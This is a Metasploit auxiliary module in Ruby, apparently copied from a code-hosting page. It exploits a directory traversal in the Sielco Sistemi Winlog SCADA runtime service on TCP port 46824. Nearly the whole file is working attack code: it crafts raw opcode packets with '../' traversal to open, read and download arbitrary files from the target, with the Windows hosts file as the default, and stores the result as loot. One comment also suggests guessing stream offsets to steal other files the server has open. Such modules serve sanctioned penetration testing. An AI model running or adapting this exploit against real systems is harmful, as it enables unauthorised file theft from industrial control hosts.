154 lines
4.3 KiB
Ruby
154 lines
4.3 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Sielco Sistemi Winlog Remote File Access',
|
|
'Description' => %q{
|
|
This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
|
|
exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
|
|
to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
|
|
2.07.14.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Luigi Auriemma', # Vulnerability Discovery and PoC
|
|
'juan vazquez' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '83275' ],
|
|
[ 'BID', '54212' ],
|
|
[ 'EDB', '19409'],
|
|
[ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
|
|
]
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(46824),
|
|
OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
|
|
OptInt.new('DEPTH', [true, 'Traversal depth', 10])
|
|
], self.class)
|
|
end
|
|
|
|
def run_host(ip)
|
|
# No point to continue if no filename is specified
|
|
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
|
|
print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
|
|
return
|
|
end
|
|
|
|
travs = "../" * datastore['DEPTH']
|
|
if datastore['FILEPATH'][0] == "/"
|
|
travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
|
|
else
|
|
travs << datastore['FILEPATH']
|
|
end
|
|
|
|
connect
|
|
|
|
# Open File through _TCPIPS_BinOpenFileFP
|
|
packet = "\x00" * 20
|
|
packet << "\x78" # Opcode
|
|
packet << travs # Path traversal
|
|
packet << "\x00"
|
|
sock.put(packet)
|
|
response = sock.get_once(5, 1)
|
|
|
|
if response.unpack("C").first != 0x78
|
|
print_error "#{ip}:#{rport} - Error opening file"
|
|
return
|
|
end
|
|
# The stream allows to identify our file since the
|
|
# server could be handling multiple files simultaneously.
|
|
# Since the stream identifier is just an offset in an array
|
|
# of opened streams it could be used to guess other files
|
|
# opened by the server and stole them :-) just an idea....
|
|
stream = response[1, 4]
|
|
|
|
# Get File Length through _TCPIPS_BinGetFileSizeFP
|
|
packet = "\x00" * 20
|
|
packet << "\x79" # Opcode
|
|
packet << stream # stream
|
|
packet << "\x00" * 7
|
|
sock.put(packet)
|
|
response = sock.get_once(5, 1)
|
|
|
|
if response.unpack("C").first != 0x79
|
|
print_error "#{ip}:#{rport} - Error getting the file length"
|
|
return
|
|
end
|
|
file_length = response[1,4].unpack("V").first
|
|
|
|
|
|
# Read File with the help of _TCPIPS_BinGetStringRecordFP
|
|
contents = ""
|
|
offset = 0
|
|
while contents.length < file_length
|
|
packet = "\x00" * 20
|
|
packet << "\x98" # Opcode
|
|
packet << [offset].pack("V") # offset (blocks of 0x55)
|
|
packet << stream # stream
|
|
packet << "\x00" * 3
|
|
sock.put(packet)
|
|
response = ""
|
|
|
|
while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
|
|
response << sock.get_once(0x7ac-response.length, 5)
|
|
end
|
|
if response.unpack("C").first != 0x98
|
|
print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
|
|
end
|
|
|
|
if (file_length - contents.length) < response.length - 9
|
|
contents << response[9, file_length - contents.length] # last packet
|
|
else
|
|
contents << response[9, response.length] # no last packet
|
|
end
|
|
|
|
offset = offset + 0x17 # 17 blocks in every packet
|
|
end
|
|
|
|
# Close File through _TCPIPS_BinCloseFileFP
|
|
packet = "\x00" * 20
|
|
packet << "\x7B"
|
|
packet << "\x00" * 11
|
|
sock.put(packet)
|
|
response = sock.get_once(-1, 1)
|
|
if response.unpack("C").first != 0x7B
|
|
print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
|
|
end
|
|
|
|
disconnect
|
|
|
|
print_good "#{ip}:#{rport} - File retrieved successfully!"
|
|
|
|
fname = File.basename(datastore['FILEPATH'])
|
|
path = store_loot(
|
|
'sielcosistemi.winlog',
|
|
'application/octet-stream',
|
|
ip,
|
|
contents,
|
|
fname,
|
|
datastore['FILEPATH']
|
|
)
|
|
print_status("#{ip}:#{rport} - File saved in: #{path}")
|
|
|
|
end
|
|
|
|
end
|